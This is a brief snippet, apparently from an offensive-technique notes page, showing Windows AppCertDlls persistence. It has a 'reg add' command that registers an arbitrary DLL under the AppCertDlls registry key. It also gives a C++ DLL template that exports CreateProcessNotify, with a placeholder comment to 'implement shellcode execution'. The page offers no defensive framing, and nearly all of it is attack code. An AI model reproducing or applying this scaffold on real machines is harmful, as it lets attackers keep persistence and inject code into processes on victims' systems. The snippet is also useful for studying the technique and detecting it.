Copy reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls" /V "AppCert" /T REG_EXPAND_SZ /D "c:\executable.dll" /F
Copy #include <ntstatus.h>
#include <windows.h>
#include <stdio.h>
#define APPCERT_IMAGE_OK_TO_RUN 0x00000001L
#define APPCERT_CREATION_ALLOWED 0x00000002L
#define APPCERT_CREATION_DENIED 0x00000003L
extern "C" { __declspec(dllexport) NTSTATUS NTAPI CreateProcessNotify(
LPCWSTR lpApplicationName,
ULONG uNotifyReason
)
}
NTSTATUS NTAPI CreateProcessNotify(LPCWSTR lpApplicationName, ULONG ulReason) {
NTSTATUS ntStatus = STATUS_SUCCESS;
// implement shellcode execution
return ntStatus;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {
switch ( fdwReason ) {
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/*
switch (uNotifyReason)
{
case APPCERT_IMAGE_OK_TO_RUN:
OutputDebugStringA("APPCERT_IMAGE_OK_TO_RUN");
return STATUS_SUCCESS;
case APPCERT_CREATION_ALLOWED:
OutputDebugStringA("APPCERT_CREATION_ALLOWED");
return STATUS_SUCCESS;
case APPCERT_CREATION_DENIED:
OutputDebugStringA("APPCERT_CREATION_DENIED");
return STATUS_SUCCESS;
default:
OutputDebugStringA("APPCERT_UNKNOWN");
return STATUS_SUCCESS;
}
}
*/ 